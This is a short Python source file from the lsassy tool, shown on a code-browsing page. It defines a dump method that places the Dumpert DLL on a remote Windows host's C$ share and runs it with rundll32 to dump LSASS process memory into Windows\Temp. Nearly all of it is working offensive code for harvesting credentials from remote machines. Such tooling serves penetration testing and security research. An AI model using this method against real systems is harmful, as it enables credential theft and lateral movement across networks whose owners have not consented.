Codebase list python-lsassy / c26b393 lsassy / dumpmethod / dumpertdll.py
c26b393

Tree @c26b393 (Download .tar.gz)

dumpertdll.py @c26b393raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
"""
https://github.com/outflanknl/Dumpert
"""

from lsassy.dumpmethod import IDumpMethod, Dependency


class DumpMethod(IDumpMethod):
    custom_dump_path_support = False
    custom_dump_name_support = False

    dump_name = "dumpert.dmp"
    dump_share = "C$"
    dump_path = "\\Windows\\Temp\\"

    def __init__(self, session, timeout):
        super().__init__(session, timeout)
        self.dumpertdll = Dependency("dumpertdll", "dumpert.dll")

    def prepare(self, options):
        return self.prepare_dependencies(options, [self.dumpertdll])

    def clean(self):
        self.clean_dependencies([self.dumpertdll])

    def get_commands(self):
        cmd_command = """rundll32.exe {},Dump""".format(self.dumpertdll.get_remote_path())
        pwsh_command = cmd_command
        return {
            "cmd": cmd_command,
            "pwsh": pwsh_command
        }